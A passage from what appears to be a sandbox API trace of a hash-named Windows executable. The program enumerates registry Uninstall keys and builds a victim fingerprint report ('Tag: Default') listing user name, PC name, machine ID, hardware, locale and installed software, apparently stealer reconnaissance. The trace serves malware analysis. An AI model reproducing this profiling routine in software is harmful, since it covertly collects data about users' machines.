11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 ", lpString2="14.25.28508.3" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3" [0208.109] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n" [0208.109] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.109] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x1b, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.109] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}") returned 94 [0208.109] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.109] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x19ce18*=0x2a) returned 0x0 [0208.109] lstrlenA (lpString="Microsoft Visual C++ 2005 Redistributable") returned 41 [0208.109] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n", lpString2="Microsoft Visual C++ 2005 Redistributable" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable" [0208.109] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="8.0.61001", lpcbData=0x19ce18*=0xa) returned 0x0 [0208.110] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable " [0208.110] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable ", lpString2="8.0.61001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001" [0208.110] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n" [0208.110] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.110] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x1c, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.110] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}") returned 94 [0208.110] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.110] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Office 16 Click-to-Run Extensibility Component", lpcbData=0x19ce18*=0x2f) returned 0x0 [0208.110] lstrlenA (lpString="Office 16 Click-to-Run Extensibility Component") returned 46 [0208.110] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 